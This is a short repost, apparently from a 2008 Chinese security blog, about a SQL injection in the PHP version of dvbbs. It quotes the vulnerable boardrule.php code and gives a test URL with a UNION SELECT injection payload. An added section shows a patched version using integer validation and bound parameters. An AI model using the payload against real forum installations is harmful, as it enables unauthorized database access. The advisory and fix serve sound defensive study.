0day in the PHP version of dvbbs

    [Rain March 13, 2008 15:31 | by ]
Source: 鬼仔's Blog
PS: Saw this on 鬼仔's blog; untested.
Relevant code:
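function brule() {
  global $dv,$db,$boardid,$lang,$groupboardid;
  // Request parameter is copied as-is, with no type check or escaping
  $groupboardid=$_GET['groupboardid'];
  if(!empty($_GET['groupboardid'])){
    // Vulnerable: $groupboardid is interpolated directly into the SQL text
    $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");
  }
  else{
    $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");
  }
  // (the excerpt ends here; the rest of the function is not shown)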

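The groupboardid variable is taken directly from the request and, whenever it is not empty, is inserted straight into the query, which results in SQL injection.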

Test:
http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*
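
A hardened form of the lookup above, as an added example (not dvbbs code and not from the original post): the request value must validate as a positive integer and is bound as a parameter instead of being interpolated. The PDO/SQLite setup, the `dv_` prefix, the sample rows and the function name `brule_rules` are assumptions made for illustration.

```php
<?php
// Added example, not dvbbs code. Table and column names follow the excerpt;
// the PDO/SQLite setup and the function name are assumptions.

function brule_rules(PDO $pdo, string $prefix, array $query, int $boardid): ?string
{
    // Identifiers cannot be bound as parameters, so constrain the
    // configuration-supplied table prefix to a safe character set.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    $raw = $query['groupboardid'] ?? '';
    if ($raw !== '') {
        // Accept only a positive integer; strings with SQL syntax and
        // array-valued parameters both fail validation here.
        $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            return null;
        }
        $stmt = $pdo->prepare("SELECT rules FROM {$prefix}group_board WHERE id = :id");
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    } else {
        $stmt = $pdo->prepare("SELECT rules FROM {$prefix}board WHERE boardid = :id");
        $stmt->bindValue(':id', $boardid, PDO::PARAM_INT);
    }
    $stmt->execute();
    $value = $stmt->fetchColumn();
    return $value === false ? null : (string) $value;
}

// Constructed sample data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE dv_group_board (id INTEGER PRIMARY KEY, rules TEXT)");
$pdo->exec("CREATE TABLE dv_board (boardid INTEGER PRIMARY KEY, rules TEXT)");
$pdo->exec("INSERT INTO dv_group_board VALUES (7, 'group rules')");
$pdo->exec("INSERT INTO dv_board VALUES (1, 'board rules')");

// A valid group id, then no parameter at all (falls back to $boardid).
var_dump(brule_rules($pdo, 'dv_', ['groupboardid' => '7'], 1));
var_dump(brule_rules($pdo, 'dv_', [], 1));
// The parameter value from the post's test URL fails integer validation.
$probe = '111111111/**/union/**/select/**/version()/*';
var_dump(brule_rules($pdo, 'dv_', ['groupboardid' => $probe], 1));
```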
